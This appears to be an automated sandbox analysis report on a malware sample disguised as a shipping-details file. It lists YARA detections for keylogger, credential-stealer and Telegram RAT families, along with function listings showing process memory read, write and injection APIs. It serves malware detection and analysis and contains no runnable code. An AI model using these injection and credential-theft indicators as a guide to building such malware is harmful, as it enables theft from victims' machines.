Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	02:33:09
Start date:	17/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	5.4%
Total number of Nodes:	202
Total number of Limit Nodes:	6

Executed Functions

Function 07748A10 Relevance: 4.2, Strings: 3, Instructions: 418
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ry, xrefs: 07748E12
ry, xrefs: 07748DFB
ry, xrefs: 07748DF4

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: ry$ry$ry
API String ID: 0-128149707
Opcode ID: b4d3cd43b2c44709b846752afd01b01becd6b44fafe9b897cc21f58fdbdb7fec
Instruction ID: f45e8f7a94973a526ea33b0c5fbce33fef438d17612f2c328bec5ff698a71da1
Opcode Fuzzy Hash: b4d3cd43b2c44709b846752afd01b01becd6b44fafe9b897cc21f58fdbdb7fec
Instruction Fuzzy Hash: AFF1D0F1E1425ACFCB14CFA9D4444EEFBB2FF4A390B14855AD4119B255C334AA82CF86

Function 07746521 Relevance: 4.1, Strings: 3, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

z^I, xrefs: 07746781
Te^q, xrefs: 07746830
Te^q, xrefs: 07746629

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: Te^q$Te^q$z^I
API String ID: 0-2886491258
Opcode ID: 4e973f07dd3a93ddd82e16fa28dfc43a2595cc943ea728ccd23d78d168a30f62
Instruction ID: 61fb448192999bfa744e3edafc196bfc0e3dfc9ea0aa44ef89f984d748e8b180
Opcode Fuzzy Hash: 4e973f07dd3a93ddd82e16fa28dfc43a2595cc943ea728ccd23d78d168a30f62
Instruction Fuzzy Hash: 68C18EB5E002198FCB14CFA9D9445EDFBB2FF8A350F24852AD414EB268D7309A41CF94

Function 07748B28 Relevance: 4.0, Strings: 3, Instructions: 284
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ry, xrefs: 07748E12
ry, xrefs: 07748DFB
ry, xrefs: 07748DF4

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: ry$ry$ry
API String ID: 0-128149707
Opcode ID: d7f72999ee589574b129783d132b537afdd3f52ece2d9886e3470147d6688f2e
Instruction ID: 0d3ccb7cec073f1d71d72d08730ed5d89f7b047a023496fc8e52e8ecdb2224e4
Opcode Fuzzy Hash: d7f72999ee589574b129783d132b537afdd3f52ece2d9886e3470147d6688f2e
Instruction Fuzzy Hash: BEC145B0D1420ADFCB04CFA9C4858AEFBB2FF8A381B14D559D411AB354D734AA82CF95

Function 0774654D Relevance: 4.0, Strings: 3, Instructions: 273
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

z^I, xrefs: 07746781
Te^q, xrefs: 07746830
Te^q, xrefs: 07746629

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: Te^q$Te^q$z^I
API String ID: 0-2886491258
Opcode ID: 2a7bff692c6cf5e9e07b505dbf87e46373f86c8dc4e681d91f69d5f62bec19f2
Instruction ID: bddabf8f52e932ddd0ad915e2e4eeedb2eaa14214f489a3551d6d9e804a40dc9
Opcode Fuzzy Hash: 2a7bff692c6cf5e9e07b505dbf87e46373f86c8dc4e681d91f69d5f62bec19f2
Instruction Fuzzy Hash: 33B127B5E102198FCB08CFA9C9845EDFBB2FB8A350F24842AD415FB268D7349901CF64

Function 077465C0 Relevance: 4.0, Strings: 3, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

z^I, xrefs: 07746781
Te^q, xrefs: 07746830
Te^q, xrefs: 07746629

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: Te^q$Te^q$z^I
API String ID: 0-2886491258
Opcode ID: bc2c0b274240cce02648c5e8a710a6e00a35b1636db550f87a43ff09bac17354
Instruction ID: f398c727bc87f8699ab971b4785f9992f73bf9e37b60cbf854dcf9ba7104a2c5
Opcode Fuzzy Hash: bc2c0b274240cce02648c5e8a710a6e00a35b1636db550f87a43ff09bac17354
Instruction Fuzzy Hash: F191B4B4E102199FCB08CFAAC9849DDFBB2FF89350F24942AD415BB264D7349905CF55

Function 0774F408 Relevance: 2.7, Strings: 2, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UC;", xrefs: 0774F606
TuA, xrefs: 0774F588

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: TuA$UC;"
API String ID: 0-2071649361
Opcode ID: 0807c4512056f170f7c345215348c0b64bfc56cf914d73d5489f3533bd997578
Instruction ID: b2f95bbe45a2bf90fedab5815b8f44f0b58c57e8776e1668aa99ddb089a29107
Opcode Fuzzy Hash: 0807c4512056f170f7c345215348c0b64bfc56cf914d73d5489f3533bd997578
Instruction Fuzzy Hash: 9991F8B4D25209EFCB08CFA9E5819AEFBF2FF89350F14942AE415A7264DB3499418F50

Function 0774F418 Relevance: 2.7, Strings: 2, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UC;", xrefs: 0774F606
TuA, xrefs: 0774F588

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: TuA$UC;"
API String ID: 0-2071649361
Opcode ID: 6db2176002306d40dd33eb27507b0c7bff71609152fcdff1c2804eec71079734
Instruction ID: 7dd48ded42d2e79f5303d2bf82361d2b43cf9f961c729010f9bdc7c6a24e4090
Opcode Fuzzy Hash: 6db2176002306d40dd33eb27507b0c7bff71609152fcdff1c2804eec71079734
Instruction Fuzzy Hash: 5791E8B4D25209EFCB08CFAAE5819AEFBF2FF89350F14942AE415A7264DB349541CF50

Function 079A05F0 Relevance: 1.6, Strings: 1, Instructions: 325COMMON

Download Yara Rule

Strings

{#L, xrefs: 079A07C8

Memory Dump Source

Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: {#L
API String ID: 0-1361971085
Opcode ID: 5ffc28365139db3a6baf4d6d387d0ef31eca95f3204826121619c4407e0332c7
Instruction ID: 689770c7cba708f6cd4f761d12d98d966c631cca637a2f8438817b97913421f4
Opcode Fuzzy Hash: 5ffc28365139db3a6baf4d6d387d0ef31eca95f3204826121619c4407e0332c7
Instruction Fuzzy Hash: 7AD107B0E16619DFCB18CFAAD58059DFBF2BF89344F14D92AD419AB224E7309902CF54

Function 079A05E0 Relevance: 1.6, Strings: 1, Instructions: 323COMMON

Download Yara Rule

Strings

{#L, xrefs: 079A07C8

Memory Dump Source

Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: {#L
API String ID: 0-1361971085
Opcode ID: 961bc9672ebc2596f98f5f358302ed9e876d4a9cc5829e36d23e6ceca90b6ffd
Instruction ID: 9c5dd2a74abb746ab492fc30fa2b8e53fea8df8ac23302dbe20c2d102bb96f46
Opcode Fuzzy Hash: 961bc9672ebc2596f98f5f358302ed9e876d4a9cc5829e36d23e6ceca90b6ffd
Instruction Fuzzy Hash: 00D117B0E16619DFCB18CFAAD58059DFBF2BF89344F14D92AD419AB224E7309902CF54

Function 027F6F90 Relevance: 1.4, Strings: 1, Instructions: 189COMMON

Download Yara Rule

Strings

`Ygl, xrefs: 027F6FF8

Memory Dump Source

Source File: 00000000.00000002.1728957466.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27f0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: `Ygl
API String ID: 0-397929779
Opcode ID: 85b2850532a3ebc1918af408563a15a8e7c82e9f137d44b54534f9aadd738b70
Instruction ID: 0bf6a06b5e2d8c3a8ca2d4b5dd3dcc566371a7ba9bcf926b39d8de8b0252c3d4
Opcode Fuzzy Hash: 85b2850532a3ebc1918af408563a15a8e7c82e9f137d44b54534f9aadd738b70
Instruction Fuzzy Hash: 0091B274E01219CFCB58DFA9D984A9EBBB2FF88304F1085A9D419AB365DB309D46CF50

Function 0774E3D8 Relevance: 1.4, Strings: 1, Instructions: 187COMMON

Download Yara Rule

Strings

iUfo, xrefs: 0774E4FE

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: iUfo
API String ID: 0-3820436262
Opcode ID: 5096c25a37a1e921e11f40e05042c7454833784de81d15afa0b29af348013349
Instruction ID: ababd6ab3b068454458e250cf68dfada3a5f49f26231c7a61b6495ccb81ef1d3
Opcode Fuzzy Hash: 5096c25a37a1e921e11f40e05042c7454833784de81d15afa0b29af348013349
Instruction Fuzzy Hash: 257123B4E11219DFCF48CFA9D9455EEBBB2FF89320F10946AE405E7350E7749A418B50

Function 027F3E28 Relevance: 1.4, Strings: 1, Instructions: 187COMMON

Download Yara Rule

Strings

`Ygl, xrefs: 027F6FF8

Memory Dump Source

Source File: 00000000.00000002.1728957466.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27f0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: `Ygl
API String ID: 0-397929779
Opcode ID: 7f64e7d7bce2ff4e62574f4fd5bde7f67bfce6fde5405e17a2de70883ad1882a
Instruction ID: 93501099aea168396f0ebae178157b86d5159d2f2d65eed1f368c89479d6e25a
Opcode Fuzzy Hash: 7f64e7d7bce2ff4e62574f4fd5bde7f67bfce6fde5405e17a2de70883ad1882a
Instruction Fuzzy Hash: 2691C374E00219CFCB54DFA9D984A9EBBF2BF88304F1085A9D419AB369DB309D46CF40

Function 0774DDE2 Relevance: 1.4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

Strings

5=6, xrefs: 0774DF1E

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: 5=6
API String ID: 0-2897083178
Opcode ID: f776d3368abd70559f0b62813d7997936911209fdac01b9e19359c530d505889
Instruction ID: 8a095da0b71b554139e7704f5714f25cf7cec7adfc694696441bbf458f08fa36
Opcode Fuzzy Hash: f776d3368abd70559f0b62813d7997936911209fdac01b9e19359c530d505889
Instruction Fuzzy Hash: E77179B4E1521A9FCB08CFA5D9414EEFBB2FF89350F00D92AD016E7264DB749A018F54

Function 0774DDF0 Relevance: 1.4, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

5=6, xrefs: 0774DF1E

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: 5=6
API String ID: 0-2897083178
Opcode ID: d5fbc7aa23952ecc6718584b942693172de0bd2e476d1d4172d84fdd7b3d0a99
Instruction ID: cfb496185e6e67490bae747c70a1ad7bb6a4e564c61708076a81766c04b597f6
Opcode Fuzzy Hash: d5fbc7aa23952ecc6718584b942693172de0bd2e476d1d4172d84fdd7b3d0a99
Instruction Fuzzy Hash: 456168B4E1521A9FCB08CFA6D8414AEFBF2FF89350F10D92AD116E7264DB749A018F54

Function 0774E3E8 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

iUfo, xrefs: 0774E4FE

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: iUfo
API String ID: 0-3820436262
Opcode ID: 9d9c87c6edab00dff622a9ecd60f26f035830bcaeb65c2d8f4bda70faf678e0b
Instruction ID: e5ecd091de27457e6fad90cc33aaa285a21093640a1a8cf6d19e9f951a71fa09
Opcode Fuzzy Hash: 9d9c87c6edab00dff622a9ecd60f26f035830bcaeb65c2d8f4bda70faf678e0b
Instruction Fuzzy Hash: C55100B4E112199FCF58CFAAD8455EEFBB2FF89310F10842AE405B7254EB785A418F64

Function 079A0006 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21eb3d1a5f261de275d20ce13c47752f7718de5b80120c7895119d7a0261af27
Instruction ID: 6fa169f0ed1adc30228e3de4c90c53ad410bc46bd3afd11bfc4812342aee5a55
Opcode Fuzzy Hash: 21eb3d1a5f261de275d20ce13c47752f7718de5b80120c7895119d7a0261af27
Instruction Fuzzy Hash: D6B149B0D16219DFCB18CFAAD58069EFBB2FF89300F24D42AD415A7255EB349A02CF50

Function 079A0040 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0390c19cdc463c451bf13c29d9bed219044824f2d8488f21d6908c1b78213ce9
Instruction ID: fc2e6fab062518461a7b57054643ea8e9e36cdd73c021478743e2cc2244fb2c1
Opcode Fuzzy Hash: 0390c19cdc463c451bf13c29d9bed219044824f2d8488f21d6908c1b78213ce9
Instruction Fuzzy Hash: A0B1F9B1D16219DFCB18CFAAD58069EFBB2FF89304F20D42AD415A7254EB749A06CF50

Function 079A2C57 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c73235d4619ee6930608af0f4cb91b0d222d2f885b6e44b492b25d1b0768666d
Instruction ID: 24800f6b25913bcf272408a07f5eaa80ba7d5a3be65ccd0d7cf21662c511b03c
Opcode Fuzzy Hash: c73235d4619ee6930608af0f4cb91b0d222d2f885b6e44b492b25d1b0768666d
Instruction Fuzzy Hash: 5541B0F2E05619ABDB18CF6AC8007AEBBF7BFC5304F04C5B9D548AA254EB7409418F91

Function 07747CAA Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a843a0cf31504e65223173a2a404a704f5dab44917f614eba9fdcac50ac97812
Instruction ID: 6a2aaafb1f32e0a202f7e38f02a367ae06730e574e48739bac8b67e0668d84a1
Opcode Fuzzy Hash: a843a0cf31504e65223173a2a404a704f5dab44917f614eba9fdcac50ac97812
Instruction Fuzzy Hash: EE3128B1E006588BDB18CFAAD8402DEFBB3BFC9310F14C06AD409AA264DB341A55CF90

Function 05C3AD88 Relevance: 6.6, Strings: 5, Instructions: 318
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 05C3AEE2
Hbq, xrefs: 05C3AE9D
Hbq, xrefs: 05C3B1A9
Hbq, xrefs: 05C3B1DC
Hbq, xrefs: 05C3AE58

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq$Hbq$Hbq
API String ID: 0-1677660839
Opcode ID: 78627db2185858eb3b0d18e80f9c0a4c29f3c9d68f06be1907acbe5342f39d4d
Instruction ID: e3a0e97a7b2aadcaabfb499716fb428fd4a081916d10d8eac9e04ef461047f8b
Opcode Fuzzy Hash: 78627db2185858eb3b0d18e80f9c0a4c29f3c9d68f06be1907acbe5342f39d4d
Instruction Fuzzy Hash: 03B169357002188FCB19EF78D5549AE77F6BFC8200B2448A9D902EB3A4DE39DD46CB61

Function 079AA238 Relevance: 2.0, APIs: 1, Instructions: 510
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 079AA640

Memory Dump Source

Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: bb99cdef6e2cbc5c113408b202b30b11830197654ef7145590e239eaaf8cc6b8
Instruction ID: dd8143e24a6d5469384fd7269e92f8f9128de5a73f089fe3a0db68e9e62e61e6
Opcode Fuzzy Hash: bb99cdef6e2cbc5c113408b202b30b11830197654ef7145590e239eaaf8cc6b8
Instruction Fuzzy Hash: 713169B28053999FDB11DFA9C8817DEBFF4FF49310F14842AD548AB251C7349845CBA5

Function 079AA74C Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 079AA98E

Memory Dump Source

Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: bd3f053bda94988039c8ebdcfdff0c15a1774a32c98ff7779f54e7e9022f8816
Instruction ID: b794e51d1f492a9f5d5033d2916b037a6cc6ccd6c843993c963aff1b52b3c552
Opcode Fuzzy Hash: bd3f053bda94988039c8ebdcfdff0c15a1774a32c98ff7779f54e7e9022f8816
Instruction Fuzzy Hash: 2DA19DB1D0121ADFDB10CF68C9417EDBBB6FF44314F0481AAE848A7250DB349986CF92

Function 079AA758 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 079AA98E

Memory Dump Source

Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8e3d6afee35bed1718d65fa675f252373c58561deb2932c31c8fdb1dbeded668
Instruction ID: f89f98c3ecf8a2303364b07ab58704695782da5a04e046a1150143fec42f9dee
Opcode Fuzzy Hash: 8e3d6afee35bed1718d65fa675f252373c58561deb2932c31c8fdb1dbeded668
Instruction Fuzzy Hash: DD917CB1D0121AEFDB14CF68C9407EDBBB6FF48314F1481A9E849A7250DB749986CF92

Function 027FB2E0 Relevance: 1.7, APIs: 1, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 027FB546

Memory Dump Source

Source File: 00000000.00000002.1728957466.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27f0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 80b1ad44f9c8b6708b1f954212c73a526dc2f920e10d74f64197abd32c195d19
Instruction ID: 9604edac1eac887b68babf72bcb128540d138afd08aaf1c5f68f7d801bef7fc9
Opcode Fuzzy Hash: 80b1ad44f9c8b6708b1f954212c73a526dc2f920e10d74f64197abd32c195d19
Instruction Fuzzy Hash: BA812370A04B058FDBA4DF29D14476ABBF2FF88308F008929D58ADBB50DB74E945CB91

Function 07740013 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 077400D7

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 2bf6075ddc7b89920bc5a815f0b54a21d14f3c918876254c8da0719d8a68dddb
Instruction ID: 4626cd8672ce689c9781b58162aeecb8b308515432b724ab61d3af6a4940b483
Opcode Fuzzy Hash: 2bf6075ddc7b89920bc5a815f0b54a21d14f3c918876254c8da0719d8a68dddb
Instruction Fuzzy Hash: 503159B29003499FDB11CFA9D884A9EFFF5EF09310F14849AE558A7221C371A904CFA0

Function 027F44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 027F59C9

Memory Dump Source

Source File: 00000000.00000002.1728957466.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27f0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 5357b53b9758ea112ef13b17e32a96bf3cc8b05d38e601c2fff3a3b6e8b2a7ef
Instruction ID: 230b182147cef01386453536b26683efd52d3aaf4bb03602ffca818ba4d33fb0
Opcode Fuzzy Hash: 5357b53b9758ea112ef13b17e32a96bf3cc8b05d38e601c2fff3a3b6e8b2a7ef
Instruction Fuzzy Hash: D441FFB0C04719CFDB24CFA9C884BDEBBB5BF48304F6080AAD509AB255DB756949CF90

Function 027F590D Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 027F59C9

Memory Dump Source

Source File: 00000000.00000002.1728957466.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27f0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 72ee56383b24cb89bd385e6acda9dc59d6624cf73facbbd038c9c3c82ffaf9b2
Instruction ID: 239209f6315f3a172d05a70720d278b5bc0c6550a556f4301b1c3a5b8ae9cf74
Opcode Fuzzy Hash: 72ee56383b24cb89bd385e6acda9dc59d6624cf73facbbd038c9c3c82ffaf9b2
Instruction Fuzzy Hash: 5441DFB0C0071DCBDB24CFA9C9847DDBBB6BF48304F2484AAD409AB255DB756989CF90

Function 079AA0C8 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 079AA160

Memory Dump Source

Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e38c135bdf0f2a768f07a5528c9c012bcc6fcc642c113657ebe5af5625b5b623
Instruction ID: c52446906bcae0f48994159ec3c6af59485ca7d3b8de7ea6b990644f449f497d
Opcode Fuzzy Hash: e38c135bdf0f2a768f07a5528c9c012bcc6fcc642c113657ebe5af5625b5b623
Instruction Fuzzy Hash: FB2146B1901359AFCB10CFA9C881BDEBBF5FF48314F10842AE958A7240C778A955CBA4

Function 07740040 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 077400D7

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 03a8556e8179da5ee8161f0fe7582a0cfe9634f5e3a8829efb779d576df96315
Instruction ID: 54193312e78fb81e97bd8f6dd9875dc907455873c3503cb962b94fe4f28071b8
Opcode Fuzzy Hash: 03a8556e8179da5ee8161f0fe7582a0cfe9634f5e3a8829efb779d576df96315
Instruction Fuzzy Hash: 4D21B2B5D002499FDB10CF9AD884ADEFBF5FF48360F14842AE919A7210D775A944CFA4

Function 079AA0D0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 079AA160

Memory Dump Source

Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
